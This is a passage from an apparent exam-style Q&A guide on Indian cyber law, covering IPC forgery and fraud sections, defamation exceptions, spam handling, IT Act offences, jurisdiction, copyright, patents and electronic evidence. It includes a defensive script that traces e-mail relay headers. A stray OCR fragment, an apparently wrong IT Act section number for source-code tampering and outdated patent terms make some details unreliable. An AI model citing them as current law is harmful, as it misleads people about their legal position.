Ans. There are some provisions in the Indian Penal Code which are similar to cyberfraud. These offences with IPC section and punishment are given in table 3.2. 


Table 3.2 

| S.No. | IPC Section | Offence/Provision | Punishment |
|---|---|---|---|
| (i) | 403 | Dishonest misappropriation of property. | Imprisonment for a term which may be extended to two years, or with fine, or both. |
| (ii) | 405, 406 | Criminal breach of trust. | Imprisonment for a term which may be extended to three years, or with fine, or both. |
| (iii) | 408 | Criminal breach of trust by clerk or servant. | Imprisonment for a term which may be extended to seven years and fine. |
| (iv) | 409 | Criminal breach of trust by a public servant, or by a banker, merchant, factor, broker, attorney or agent. | Imprisonment for life, or imprisonment for a term which may be extended to ten years and fine. |
| (v) | 463/465 | Forgery. | Imprisonment for a term which may be extended to two years, or with fine, or both. |
| (vi) | 464 | Acts amounting to making a false document. | (definition only) |
| (vii) | 466 | Forgery of records of Court or of public registrar. | Imprisonment for a term which may be extended to seven years and fine. |
| (viii) | 468 | Forgery for the purpose of cheating. | Imprisonment for a term which may be extended to seven years and fine. |
| (ix) | 469 | Forgery for the purpose of harming reputation. | Imprisonment upto three years and fine. |
| (x) | 470 | When a false document is a forged document. | (definition only) |
| (xi) | 471 | Using a forged document as genuine. | Imprisonment for a term which may be extended to two years, or with fine, or both. |
| (xii) | 476 | Counterfeiting device or mark used for authenticating documents other than those described under section 467, or possessing counterfeit marked material. | Imprisonment for a term which may be extended to seven years and fine. |
| (xiii) | 477 | Fraudulent cancellation, destruction, etc. of a valuable security etc. | Imprisonment for life, or imprisonment for a term which may be extended to seven years and fine. |
| (xiv) | 477A | Falsification of accounts. | Imprisonment for a term which may be extended to seven years, or with fine, or both. |
| (xv) | 481 | Acts amounting to using a false property mark. | (definition only) |
| (xvi) | 482 | Punishment for using a false property mark. | Imprisonment for a term which may be extended to one year, or with fine, or both. |
| (xvii) | 483 | Counterfeiting a property mark used by another. | Imprisonment for a term which may be extended to two years, or with fine, or both. |
| (xviii) | 484 | Counterfeiting a mark used by a public servant. | Imprisonment upto three years and fine. |
| (xix) | 485 | Making or possession of any instrument for counterfeiting a property mark. | Imprisonment for a term which may be extended upto three years, or with fine, or both. |
| (xx) | 489 | Tampering with property mark with the intention to cause injury. | Imprisonment for a term which may be extended to one year, or with fine, or both. |


Q.11. What kind of statements are not considered as offence of defamation ? 

Ans. Statements which fall under the following ten exceptions are not considered as offence of defamation — 

(i) A statement which is true and is for the public good, concerning any person. It means that a statement that is true but harms the reputation is defamatory until and unless it is for the good of the public. 

(ii) An opinion expressed in good faith regarding the conduct of a public servant in the discharge of his public functions, or regarding his character, so far as his character appears in that conduct. 

(iii) A substantially true report or result of the proceedings of a court of justice, when published. 

(iv) When a person touches a public question, an opinion expressed in good faith regarding his/her conduct. 

(v) The merits of any case, civil or criminal, which has been decided by a court of justice, or the conduct of a person as a party, witness or agent in any such case, expressed in good faith, if it is for the public good. 

(vi) The merits of any performance which its author has submitted to the judgement of the public, or the character of the author so far as it appears in that performance, if it is for the public good. 

(vii) Censure passed in good faith by a person having lawful authority over another on the conduct of that other in matters to which the authority relates. 

(viii) Statements against any person to any of those who have lawful authority over that person with respect to the subject matter of the accusation, made in good faith. 

(ix) Statements made in good faith for the protection of the interest of the person making them, on the character of another. 

(x) Caution conveyed in good faith by one person against another, which is intended for the good of the person to whom it is conveyed. 

The law of defamation attempts to balance the democratic freedom of speech and expression and the public good by providing the above given exceptions. 

Q.12. What is e-mail abusing ? How can the e-mail abusing be reduced ? 

Ans. Unsolicited e-mail, which is also known as spam, is an increasing problem on the Internet. Our valuable time is robbed by e-mail spam. Network resources are consumed and storage space on our servers is used up by e-mail spam. To deal with e-mail spam, it is best not to reply to a spam message for any reason; a reply validates our e-mail address and will result in more spam. When we are publishing web pages, we should use the HTML character sequence for @ (&#64;) in place of the @ symbol in e-mail addresses to fool e-mail harvesters. The spam messages should be copied to UIS e-mail abuse (or emailabuse@uis.edu). We should copy any incoming messages with recurring detectable and traceable origins to the UIS e-mail abuse mailbox. The offending e-mail must be copied and not forwarded, to preserve the Internet headers. These headers allow us to trace the route. Steps to copy the e-mail message to UIS are as follows — 

(i) In MS Outlook, left click on the e-mail message so that it is highlighted. 

(ii) Click on Edit on the Outlook menu bar. 

(iii) Click on Copy. 

(iv) Now open a new mail message. 

(v) Type UIS e-mail abuse or emailabuse@uis.edu in the To field. 

(vi) Type e-mail abuse in the Subject field. 

(vii) Now click in the message area of the new message. 

(viii) Now click on Edit on the Outlook menu bar. 

(ix) Now click on Paste. 

(x) Click Send. 

(xi) Now use the Delete key to remove the original spam message. 

(xii) Use the junk and adult content filters in Outlook (available under Tools, Organize). 

A number of methods are used by e-mail spam criminals which make it very difficult for network and e-mail administrators to block their messages. The criminals often send their messages from a borrowed e-mail address, i.e. sending the message as someone else. Then they change that address continuously so as to prevent their messages from being blocked. Spammers spoof an e-mail address so as to make it appear to have originated from a legitimate website, such as google.com or hotmail.com. Spammers often relay their messages through three or four e-mail servers to make tracing the messages back to the source difficult. 
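As an added defender-side example (not part of the original text), the following Python script reconstructs the relay route from the Received headers that a copied message preserves, and flags an origin whose claimed name is not confirmed by the receiving server. The sample message, host names and addresses are constructed; the Received format parsed is the common "from X (rdns [ip]) by Y ...; date" form.

```python
"""Trace an e-mail's relay route from its Received: headers (added example).

Each mail server prepends its own Received: line, so the header block is a
newest-first log of the hops.  Copying (not forwarding) the message keeps
these lines intact, which is what an abuse mailbox needs to trace the route.
The sample message below is constructed: host names use example.* and the
documentation address ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24.
"""
import email
import re
from email.utils import parseaddr

# Constructed sample: the visible From: claims google.com, but the first
# receiving relay could not confirm the sender's name (rDNS "unknown").
SAMPLE_RAW = """\
Received: from relay3.example.net (relay3.example.net [203.0.113.30])
    by mx.uis.example (Postfix) with ESMTP id 3AB12
    for <user@uis.example>; Tue, 5 Mar 2019 10:03:11 +0000
Received: from relay2.example.org ([198.51.100.20])
    by relay3.example.net with ESMTP; Tue, 5 Mar 2019 10:02:58 +0000
Received: from mail.google.com (unknown [192.0.2.7])
    by relay2.example.org with SMTP; Tue, 5 Mar 2019 10:02:40 +0000
From: "Account Team" <support@google.com>
To: user@uis.example
Subject: Verify your account

Please confirm your password at the link below.
"""

_RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"           # name the sender announced in HELO/EHLO
    r"(?:\s+\((?P<paren>[^)]*)\))?"   # receiver's own note: "rdns-name [ip]"
    r".*?\bby\s+(?P<by>\S+)",         # the server that wrote this line
    re.DOTALL,
)
_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value):
    """Parse one Received: header value into a hop dict (None if unparseable)."""
    value = re.sub(r"\s+", " ", str(value)).strip()   # unfold continuation lines
    m = _RECEIVED_RE.search(value)
    if not m:
        return None
    paren = m.group("paren") or ""
    ip = _IP_RE.search(paren)
    # "(host [ip])" -> host; "([ip])" alone -> no reverse-DNS name recorded
    rdns = "" if not paren or paren.startswith("[") else paren.split(" ")[0]
    return {
        "helo": m.group("helo"),
        "rdns": rdns,                 # "unknown" = receiver found no PTR record
        "ip": ip.group(1) if ip else "",
        "by": m.group("by"),
        "date": value.rsplit(";", 1)[1].strip() if ";" in value else "",
    }


def trace_route(raw):
    """Return the hops in chronological order: true origin first, our MX last."""
    msg = email.message_from_string(raw)
    hops = [h for h in map(parse_received, msg.get_all("Received", [])) if h]
    hops.reverse()                    # headers are newest-first; flip to oldest-first
    return hops


def origin_warnings(raw):
    """Explain why the visible sender should not be trusted, as a list of strings."""
    msg = email.message_from_string(raw)
    hops = trace_route(raw)
    if not hops:
        return ["no Received: headers; the message was probably forwarded, not copied"]
    origin = hops[0]
    _, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    warnings = []
    if origin["rdns"] == "unknown":
        warnings.append(f"origin {origin['ip']} has no reverse DNS; "
                        f"HELO name '{origin['helo']}' is unverified")
    elif origin["rdns"] and origin["rdns"].lower() != origin["helo"].lower():
        warnings.append(f"origin announced '{origin['helo']}' but resolves to "
                        f"'{origin['rdns']}'")
    real_name = (origin["rdns"] or origin["helo"]).lower()
    if from_domain and real_name != from_domain and not real_name.endswith("." + from_domain):
        warnings.append(f"From: domain '{from_domain}' is not confirmed by the "
                        f"originating host ({real_name} {origin['ip']})")
    if len(hops) >= 3:
        warnings.append(f"relayed through {len(hops)} receiving servers before delivery")
    return warnings


if __name__ == "__main__":
    for i, hop in enumerate(trace_route(SAMPLE_RAW), 1):
        print(f"hop {i}: {hop['helo']} ({hop['rdns'] or '-'} {hop['ip']}) "
              f"-> {hop['by']} at {hop['date']}")
    for w in origin_warnings(SAMPLE_RAW):
        print("WARNING:", w)
```

Only the bottom-most Received line, written by the first relay, is outside the sender's control in a relayed message; every line above it was added by servers the message genuinely passed through, which is why a forwarded copy (which drops them) cannot be traced.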
Q.13. What is harassment ? 

Ans. Harassment through the Internet has spread everywhere. When a person is disturbed by receiving a lot of calls or e-mails for contacts of call girls, or some pornographic material or such other things that the person is not related to, it is known as harassment. Harassment may become a cybercrime in the near future. The problem of harassment is not restricted to film stars and famous people; even ordinary users of the Internet are using this medium for harassing their enemies. 


OTHER IT ACT OFFENCES, MONETARY PENALTIES, 
JURISDICTION AND CYBERCRIMES, NATURE OF 
CRIMINALITY, STRATEGIES TO TACKLE CYBERCRIME 
AND TRENDS 


Q.14. Explain the IT Act offences other than cyber crimes like hacking, teenage web vandals, cyberfraud and cheating etc. 

Ans. There are certain other offences in the IT Act 2000 besides the cybercrimes discussed. When the source code of computer software used for a computer, computer network, computer program or computer system is altered or destroyed intentionally by a person, even though that source code is required to be kept or maintained by law for the time being in force, this is said to be the offence of tampering with computer source documents. This offence is punishable under section 66 of IT Act 2000 with imprisonment for a term which may be extended upto three years or with fine which may be extended upto ₹ 2 Lakh or both. If a person fails to comply with the order of the Controller of Certifying Authorities, he/she is punishable under section 68 of IT Act 2000, with imprisonment for a term not exceeding three years or with a fine upto ₹ 2 Lakh or both. 

The Controller of Certifying Authorities may direct any agency of the government to intercept any information transmitted through any computer, if he is satisfied that it is necessary in respect of the integrity and sovereignty of India. Every user or person in charge of a computer will have to provide all facilities and help to decrypt the information. If anyone refuses to assist the agency then he/she shall be punishable under section 69 of the IT Act 2000, with imprisonment for a term which may be extended upto 7 years. 

A person who breaks the confidentiality and privacy shall be liable for punishment, with imprisonment for a term which may be extended upto two years, or with fine which may be extended to ₹ 1 Lakh or both, under section 72 of IT Act 2000. 

If a digital signature certificate is published with the knowledge that the certifying authority listed in the certificate has not issued it, or that the certificate has been revoked or suspended, he/she shall be liable for punishment under section 73 of IT Act 2000 with imprisonment for a term which may be extended upto two years, or with fine upto ₹ 1 Lakh or both. 


"n fine upto ; sed 
Q.15. What are monetary penalties ? When shall a criminal be liable to monetary penalties ? 

Ans. When a criminal is punished to pay damages by way of penalties only, instead of imprisonment, for offences, then these penalties are known as monetary penalties. There are many contraventions for which a person would be liable to pay damages by way of penalties for non-compliance with certain requirements. If a person performs any one or more of the following acts on a computer, without permission of the owner or in-charge of the computer, then he/she shall be liable to pay damages by way of compensation not exceeding ₹ 1 Crore to the person so affected, i.e. the victim — 

(i) He/she accesses a computer, computer system or network for which he/she is not authorized. 

(ii) Any data or copies of data are extracted, or a computer database or information from a computer, computer system or network is downloaded. 

(iii) Computer viruses are introduced on any computer, computer system or network. 

(iv) Any computer, computer system or computer network is disrupted. 

(v) Any computer, computer system or network, data, computer database or any other program residing in such computer is damaged by the person. 

(vi) Any authorized person is denied access to the computer, computer system or computer network by him/her. 

(vii) Facilitating access to a computer, computer system or network by providing assistance to any other person. 

It is clear that infringements punishable with imprisonment are triable by 
criminal courts, whereas the infringements punishable with penalty or 
compensations have been left for adjudication by an adjudicating officer. For 
the purpose of adjudication of infringements for which compensation or 
penalties are provided, an adjudicating authority has been created separately. 
Any officer who is equivalent or above the rank of director to the Government 
of India or of State Government, shall be appointed by the Central Government. 

Q.16. What is the meaning of the term jurisdiction ? 

Ans. It is stated in the IT Act 2000 that an offence, whether committed in India or outside India by any person irrespective of his nationality, would be punishable unless otherwise provided in the Act. Thus it is clear that the Act shall be applicable to an offence committed outside India by any person, if the offence committed involves a computer, computer system or computer network located in India. 
The words "act or conduct constituting the offence or contravention involves a computer, computer system or computer network located in India" are very significant to determine the jurisdiction of the IT Act over acts committed outside India. For an offence committed outside India, we have to prove that the act involved a computer, computer system or computer network located in India, for the IT Act to assume jurisdiction. E.g., a website containing pornographic materials is created anywhere in the world. This will not give the IT Act jurisdiction to question the site unless the creation or running of the site involves any computer, computer system or computer network located in India. But if the website uses a server or network in India, the IT Act would assume jurisdiction to question the site under section 67 of the IT Act. Another example is when any computer or computer network in India is hacked by a person anywhere in the world; this explains the jurisdiction of the IT Act in India, and to punish the accused section 66 of the IT Act would be charged, because his/her act involved a computer in India. 

Q.17. What is the basic legal principle of jurisdiction under criminal procedure code ? 

Ans. The basic legal principle of jurisdiction under the Criminal Procedure Code, 1973 is that an offence which is committed would be inquired into and tried by the court within whose local jurisdiction it was committed. These principles are applied for determining jurisdiction in investigation by the police as well as in trial by courts. Where an offence is committed in more than one place, or partly committed in one place and partly in another place, or it is a continuing offence which continues to be committed in more than one place, or the offence consists of several acts done in different areas, then it may be inquired into or tried by a court having jurisdiction over any of such areas. On the other hand, where it is uncertain in which of several areas an offence was committed, it may be inquired into or tried by a court having jurisdiction over any of those areas. Where an offence is committed by reason of anything which has been done, the offence may be inquired into or tried by the court within whose local jurisdiction the act was done; e.g., in the case of cyber defamation, where the defamatory act and its effect take place at different places, it will be inquired into or tried in the court of either jurisdiction. 

There are certain offences which would be inquired into or tried at additional places, e.g., an offence of criminal misappropriation or of criminal breach of trust may be inquired into or tried by the court within whose local jurisdiction the offence was committed. 

Q.18. Describe the nature/characteristics of cybercrime. 

Ans. The characteristics of cybercrime are as follows — 

(i) Since cybercrimes are committed through technology, the cyber criminals, who have deep knowledge of the Internet and computers, are technocrats. 

(ii) Cybercrimes are very efficient because they take very little time to carry out and to take effect. The cyber criminal may hack a website or commit cyberfrauds within a few seconds or minutes. 

(iii) There are no geographical boundaries, limitations or distances in cybercrime. Computers in India can be hacked by a cyber criminal sitting in any corner of the world. 

(iv) The cyber criminals are almost invisible because cybercrimes take place in cyberspace. All the components of cyber criminality (from preparation to execution) take place in the cyber world, while the cyber criminal physically remains outside the cyberspace. Since the cyber criminals can be anywhere, the risk factor in cyber criminality is very low in comparison to traditional crimes. 

(v) Websites which were created and maintained with huge investments can be destroyed, or confidential systems such as the defence system of a country can be hacked by committing cybercrime. So cybercrime can cause harm and injury which cannot be imagined. 

(vi) Cyber criminals have the capacity to affect several countries at the same time, different from their place of operation, because of the invisibility of cyber criminality. 

(vii) The collection of evidence of cybercrime and proving it in the court of law is very difficult. 

(viii) The tools to commit cybercrime are easily and freely available on CDs in the market at very minimal charges, so cybercrimes are easy to commit. 

Q.19. What are the different strategies to tackle cybercrime ? 

Ans. Various strategies to tackle cybercrimes are as follows — 

(i) The law enforcement agencies should be trained in the complexities of technology, so they can effectively and properly conduct their investigations. An investigator should be at least a half IT engineer to be a competent investigator of cybercrime. To detect cybercrimes, technical tools such as trace and trap devices must be used by the investigator besides his/her technical knowledge. 

(ii) The law enforcement agencies of different countries should be in cooperation, because cybercrime has a tendency of jumping geographical borders. 

(iii) To bring the cybercriminals to trial across borders, effective laws of extradition and their implementation are a must. 
(iv) Encryption and other security technologies should be used to protect against cybercrime. 

(v) It is the responsibility of the IT companies to protect their systems and networks by using technologies which are secure. The IT companies should not depend on the law enforcement agencies to trace cybercriminals, because it is very difficult, since anonymity is provided by the Internet. 

(vi) The research and development of new security technologies should be facilitated and encouraged by the government. To support research and development and to facilitate education related to countering cybercrime, there should be funding from the government. 

(vii) In the IT industry, the victims are not reporting most of the cybercrimes, because of fear of losing the confidence of customers, name and fame, and the loss of business. Every victim should report the crime to law enforcement agencies. To deal with cybercrime more effectively, the information about cybercrime, so as to understand its various forms and ways, must be shared by the private sector. 

(viii) One solution to fight against cybercrime is the easy identification of netizens. All the contents and interactions on the Internet would then have to be censored, which is not recommended. 

Q.20. Explain intellectual property right with suitable example. 

(R.G.P.V., Nov. 2019) 

Ans. The concept of intellectual property can be traced back to the Byzantine empire where monopolies were granted. For instance, in Greece a one year monopoly was given to cooks to exploit their recipes. A statutory legislation in the senate of Venice provided exclusive privileges to people who invented any machine or process to speed up silk making. Thus, from intellectual property being totally alien to the nomadic community came an era where every new idea was given protection under the category of intellectual property rights. Copyright is known as one of the types of intellectual property. Before going into details of the copyright and related issues in cyberspace, we need to know the concept of intellectual property and its importance. To go home is to enter a place built and filled with human creativity and invention. From a carpet to a sofa, from the washing machine, the refrigerator and the telephone, to the music, the books, the paintings, family photographs, everything with which we live is a product of human creativity. These things are creations of the human mind and hence called intellectual property. Today the Internet is not only used for educational purposes but also for business. 

Intellectual property can be categorized into two categories i.e. industrial property and copyright. Industrial property deals with patents, trademarks, geographical indications, designs and semiconductor layout designs. On the other hand, copyright covers literary, dramatic, artistic, musical, cinematographic works and sound recordings etc. The primary legislations regulating intellectual property in India are — the Patents Act 1970, the Trade Marks Act 1999, the Geographical Indications of Goods (Registration and Protection) Act 1999, the Designs Act 2000, the Semiconductor Integrated Circuits Layout Design Act 2000 and the Copyright Act 1957. 
Q.21. Explain the term copyright act and patent law. (R.G.P.V., Nov. 2019) 

Ans. Copyright Act — Copyright law protects original works of authorship fixed in a tangible medium of expression. Works of authorship include the following categories — literary works (including computer programs); musical works (including the accompanying words); dramatic works (including any accompanying music); pantomimes and choreographic works; pictorial, graphic and sculptural works; motion pictures and other audiovisual works; and sound recordings. 

The basic elements of a copyright are expression and originality. The originality requirement is met if the work is independently created by an author and not copied from others. Further, originality does not require novelty. Thus a work will not be denied copyright protection merely because it resembles a work previously produced by someone else and, therefore, is not novel. An author or creator, however, is entitled to a copyright only in the expression of a work and not in the idea underlying the work. Consequently, copyright does not extend to an idea, fact, principle or discovery, regardless of the form in which it is described, explained, illustrated or embodied in the work. 

For a work to be eligible for copyright protection, it must be "fixed in any tangible medium of expression, now known or later developed, from which [it] can be perceived, reproduced, or otherwise communicated, either directly or with the aid of a machine or a device." A work is fixed in a tangible medium of expression "when its embodiment in a copy or phonorecord, by or under the authority of the author, is sufficiently permanent or stable to permit it to be perceived, reproduced, or otherwise communicated for a period of more than transitory duration." 

A copyright owner’s right to reproduce his or her work is an important 
aspect of the exclusive rights afforded by copyright law. At the same time, it 
allows the owner to preclude all others from making copies of the work. Copies, 
as defined in the copyright act, are material objects in which a work is fixed 
“by any method now known or later developed.” Accordingly, an Internet user 
that makes an unauthorized copy of a copyrighted work is likely to be violating 
the copyright owner’s rights. 

A copyright owner also has the exclusive right to incorporate the work 
into derivative works and to exclude others from creating works based on his 
or her work. The right of distribution assures the copyright owner of his 
or her right to the first distribution of the work. Thereafter, however, the first 
sale doctrine — which attempts to strike a balance between providing the 
copyright owner with the benefits of the copyright protection and permitting 
unimpeded circulation of the work — entitles the owner of a copy of a work to 
sell or otherwise dispose of the possession of his or her copy of the work 
without the authority of the copyright owner. 

Patent Law — A patent, in law, is a document issued by a government conferring 
some special right or privilege. In the United States, the term is restricted principally 
to patents for inventions granted under federal statute. The specific attributes of 
novelty of the item for which a patent is sought are called claims. A patent gives 
the inventor the exclusive privilege of using a certain process or of making, using, 
and selling a specific product or device for a specific period of time. 

The patent is issued in the name of the United States under the seal of the 
PTO. It consists of a short title, together with a printed copy of the specifications 
and claims, a patent number, and a grant to the patentee, his or her heirs, and 
assignees for a period of 17 years. For design patents, the period of the patent 
is 14 years. Every patent must be applied for by the actual inventor, and, if two 
or more parties make an invention jointly, they must apply jointly. Patents may 
be transferred from one party to another, and the written assignment is recorded 

in the PTO. 

Once a patent is granted, issues of infringement, the scope of the patent, 
or any other questions that arise out of the grant are within the jurisdiction of 
the U.S. district courts. Infringement consists of wrongfully making, using, or 
selling a patented invention. The law requires that patented articles be marked 
with the patent number; failure to do so will prevent the recovery of damages 
for infringement, unless the patent owner can prove that due notice of such 
infringement was given to the person charged with infringing the patent, who 
continued after such notice to make or sell the patented product. The remedy 
for an infringement is an action for damages or for a restraining injunction, or 
both. The manufacturer of an item for which a patent is sought may mark the product "patent pending" or "patent applied for"; such notice to the public affords an opportunity to others who may claim to have invented the same product to institute proceedings in the PTO to determine the originality of the claim of the applicant. 

In general, a patent affords protection against infringement only within the jurisdiction of the government by which it is issued, and it is therefore necessary to secure a patent in every country in which protection is desired. Patent statutes have been enacted in other countries as well, and the most important international treaty is the International Convention for the Protection of Industrial Property. 
THE INDIAN EVIDENCE ACT OF 1872 Vs INFORMATION 
TECHNOLOGY ACT 2000 — STATUS OF ELECTRONIC 
RECORDS AS EVIDENCE, PROOF AND MANAGEMENT OF 
ELECTRONIC RECORDS, RELEVANCY, ADMISSIBILITY AND 
PROBATIVE VALUE OF E-EVIDENCE 


Q.1. What do you mean by the term Indian Evidence Act 1872 Vs. 
Information Technology Act 2000 ? 


Ans. The amendments in Indian Evidence Act 1872 have been made in 
the second schedule of the Indian ITA 2000. These amendments were made to 
improve the IT Act 2000. It seems that the maximum amendments have been 
made to the Indian Evidence Act. 


The second schedule in the Indian Evidence Act was named “Amendments 
to the Indian Evidence Act of 1872". The amendments that were made in 
different sections of Indian Evidence Act 1872 to improve IT Act 2000 are as 
follows — 


(i) In Section 3 — 


(a) The words “all documents produced for the inspection of the 
Court” in the definition of “Evidence” would be replaced by the words “all 
documents including electronic records produced for the inspection of the 
Court”, 
(b) The expressions, namely, "Certifying authority", "digital signature", "digital signature certificate", "electronic form", "electronic records", "information", "secure electronic record", "secure digital signature" and "subscriber" would be inserted after the definition of "India", and their meaning will be the same as assigned to them in ITA 2000. 

(ii) In Section 17 — The words "oral or documentary" would be replaced by the words "oral or documentary or contained in electronic form". 
(iii) After Section 22 — The following section, named "When oral admission as to contents of electronic records is relevant", would be inserted: "22A. Oral admissions as to the contents of electronic records are not relevant, unless the genuineness of the electronic record produced is in question". 

(iv) In Section 34 — The words "Entries in the books of account including those maintained in an electronic form" would be substituted for the words "Entries in the books of account". 


(v) In Section 35 — The words “record or an electronic record” would 
be replaced for the word “record”, in both the places, where it occurs, 


(vi) For Section 39 — The following section, named "What evidence to be given when statement forms part of a conversation, document, electronic record, book or series of letters or papers", would be substituted: "39. When any statement of which evidence is given forms part of a longer statement, or of a conversation or part of an isolated document, or is contained in a document which forms part of a book, or is contained in part of an electronic record or of a connected series of letters or papers, evidence shall be given of so much and no more of the statement, conversation, document, electronic record, book or series of letters or papers as the Court considers necessary in that particular case to the full understanding of the nature and effect of the statement, and of the circumstances under which it was made". 


(vii) After Section 47 — The following section named opinion as to 
digital signature where relevant. 
“47A. When the court has to form, an opinion as to the digital signature 
of any person, the opinion of the certifying authority which has issued the 
Digital Signature Certificate is a relevant fact”, would be inserted. 


(viii) In Section 59 — The words “contents of documents or electronic 
record” would be replaced for the words “contents of documents”. 


(ix) After Section 65 — The following section, named "Special provisions as to evidence relating to electronic record", would be inserted: "65A. The contents of electronic records may be proved in accordance with the provisions of Section 65B". 


Q.2. What is the status of electronic records as evidence, before and 


after IT Act 2000 ? 


Ans. Electronic/computer evidence is a new term not covered in the Indian 
Evidence Act, 1872. Hence there is a need of certain amendments in it. There 
are many amendments in the Indian Evidence Act, 1872 by the IT Act, 2000. 
Many of these amendments are not only redundant but also confusing, due to 
a misconception about the status of electronic records as evidence. 

The oral evidence (statement of a witness) and documentary evidence 
come under the Indian Evidence Act, 1872. There are two types of evidences 
which are recognized by the definition of evidence, i.e., oral and documentary 
evidence. There are other things also which are considered as evidence, e.g., a 
gun used to commit a murder is also an evidence. The status of evidence is 
given to these things and objects by the definition of ‘proved’ and ‘fact’, though 
they are not stated in the definition of evidence. The definition of evidence 
before the amendment by the IT Act, 2000 was as follows — 

(i) All statements which are permitted by court or required to be made 
before it by witnesses, in relation to matters of fact under inquiry, such 
statements are known as oral evidence. 

(ii) The documents which are produced for inspection of the court, 
are known as documentary evidence. 

The definitions given above are amended after the IT Act 2000, as — 

(i) All statements which are permitted by court or required to be 
made before it by witnesses, in relation to matters of fact under inquiry, such 
statements are known as oral evidence. 

(ii) The documents including electronic records, which are produced 
for inspection of the court are known as documentary evidence. 

In the definitions given above, the words ‘including electronic records’ are 
confusing because prior to the IT Act, 2000, the electronic records were not 
documentary evidence. 


Q.3. Write down the characteristics of electronic record. 
Ans. Two of the odd characteristics of electronic records are as follows — 

(i) The copy of the electronic record is practically indistinguishable 
from the original one. 

(ii) Since the original electronic record was first generated and lies 
in the volatile memory of the computer, that computer would have to be brought 
to the court to prove the original electronic record by primary evidence, which 
may be practically impossible or cause immense hardships in many cases. 
Q.4. How can we prove that the given electronic record is original ? 

Ans. An electronic record must be proved by producing the electronic 
record itself for the inspection of the court, i.e., by primary evidence. In some 
exceptional cases it is possible that secondary evidence may be given relating 
to the documents, e.g., when the original document has been lost or destroyed, 
or may be in possession of the person against whom the document is to be 
proved. 

On the basis of primary and secondary evidence, the original electronic 
records are primary evidence while the computer outputs/prints are secondary 
evidence. However, it is difficult to distinguish an original electronic record from 
its copy, but there is a distinction between the two based on legal and conceptual 
terms. The documents which are generated or processed in the computer system 
will be the original electronic record. Therefore, on the basis of the principle of 
primary evidence, the computer system may have to be carried to the court 
physically for proving that the electronic record is original. The court does not 
force a person to bring the computer/computer system in the court for proving 
the electronic record on which that person is relying as evidence, because our 
legal system is flexible. However, the functionality of the computer, reliability of 
the record and computer outputs are important aspects. 

Therefore a special rule of evidence for electronic records was provided 
by section 65B of the Indian Evidence Act, 1872, introduced by the IT Act, 2000. 
In section 65B, if certain conditions are satisfied then certain computer outputs 
of the original electronic record can be admissible as documentary evidence 
in any proceedings without proof or production of the original electronic record. 

It is stated in section 65B that information contained in an electronic record 
may be in any of the following computer outputs which are produced by the 
computer — 

(i) Information which is printed on paper. 

(ii) Information which is stored or copied in any memory devices, 
such as DVD, memory card etc. 

These computer outputs will also be treated as documents of evidence on 
satisfying certain conditions. The computer outputs given above may be 
produced as proof of the contents of the original electronic record without 
proving or producing the original electronic record. 
Q.5. How can the electronic records be managed as evidence ? 

Ans. If the business transactions or e-communications are managed and 
maintained by the individuals, firms or corporates, as electronic records which 
may be required as evidence in any proceedings, then it must be ensured that 
the conditions which are specified in section 65B are satisfied. It is also advised 
to them to maintain existing records of compliance of the stipulated conditions 
given in section 65B. The maintenance of records of compliance of the 
conditions stipulated is not a legal requirement. It is a legal advice only. These 
records would be relevant under the law of evidence and can enhance the 
credibility of the compliance of section 65B of the Indian Evidence Act, 1872. 

Even being secondary evidence, the computer outputs which are satisfying 
the required conditions in section 65B would be considered to be a document. 
The computer outputs can be admissible in any proceedings as evidence of 
the contents of the original electronic record or of facts. In the fourth wing of 
the provision, the mode of proving compliance of section 65B of the Indian 
Evidence Act, 1872 is stated — 

“A certificate can do any of the following things in any proceeding where 
a statement in evidence is desired to be given, mean to say — 

(i) The electronic record which contains the statement is identified 
and the manner is described in which it was produced, 

(ii) If any device is involved in the production of that electronic record 
then it may be appropriate for the purpose of showing that the electronic record 
was produced by a computer by giving specification of that device, 

(iii) It deals with any of the matters to which the conditions mentioned 
in the sub-section (2) relate, 

and it should be signed by a person occupying a responsible official position in 
relation to the operation of the relevant device or the management of the relevant 
activities, and shall be evidence of any matter stated in the certificate”. 

The person signing the certificate would be required to prove the certificate 
in the court. The signing official may also be cross-examined by the other side. 


Q.6. What do you understand by relevancy of E-evidence ? 

Ans. It is our misunderstanding that if a computer output is admissible 
under section 65B then the same can be produced and proved in evidence. A 
computer output may be admissible as evidence, even though it is secondary 
evidence, for representing an electronic record in the court. Before it can be 
allowed to be produced and proved in any proceedings, the fact sought to be 
proved must be a relevant fact or a fact in issue. The basic principle is that evidence 
may be given in any proceeding of the existence or non-existence of a fact in issue 
and of such other facts as are declared to be relevant by the Indian Evidence Act. 

e.g., if a company JJ Ltd. maintains its accounts as electronic record, in 
which the following entry is given which shows AJ Ltd. to be indebted to JJ Ltd. — 

“Debtor’s Account 
AJ Ltd. ..... ₹200000/- (for sale and delivery of 10 HP printers on 09, 
2018 @ ₹10000/- per printer)” 

In a money recovery suit against AJ Ltd., JJ Ltd. relies upon the above 
given computer record, to prove that AJ Ltd. is indebted to it for ₹200000. 
The relevancy of this record must be satisfied by JJ Ltd. before the compliance 
of section 65B. 

Section 34 of the Indian Evidence Act gives the definition of relevancy as — 
“Entries in books of accounts which are regularly kept in the course of 
business are relevant whenever they refer to a matter into which the court has 
to inquire, though these statements may not be sufficient evidence alone to charge 
any person with liability”. 

So, we can say that the above entry can be relevant to evidence, but not 
sufficient, to prove the debt without other evidence. 


When a fact is so connected to another as provided in the Indian Evidence 
Act, 1872, then the fact is said to be relevant. When a fact in issue is connected with 
other facts so as to form part of the same transaction, then those facts are known as 
relevant facts. 
Q.7. Write a short note on admissibility of electronic record. 

Ans. The admissibility of a fact is also to be shown, as well as its relevancy, 
before any evidence of the same can be cited in any proceedings. Simply put, 
admissibility is the permission to cite the evidence. There is a big 
misunderstanding that admissibility and relevancy are synonyms, while their 
legal implications are different. There are many facts that may be admissible 
but may not be relevant, e.g., in cross-examination, to charge the credit of a 
witness with crime, the questions permitted to be put, though not relevant to the 
controversy, are yet admissible. Or consider an e-mail sent by a client to his advocate 
saying that the forgery has been committed by him and that he now wishes the 
advocate to defend him: though this communication is relevant, it is protected 
from disclosure and hence not admissible. Another example, when a person makes a 
confession to a police officer then it is relevant but is not admissible in evidence. 
However, when facts are discovered in consequence of information 
received from a person accused of an offence, in the custody of a police officer, 
whether it amounts to a confession or not, so much of such information as 
relates distinctly to the facts discovered may be proved. For citing the evidence, the 
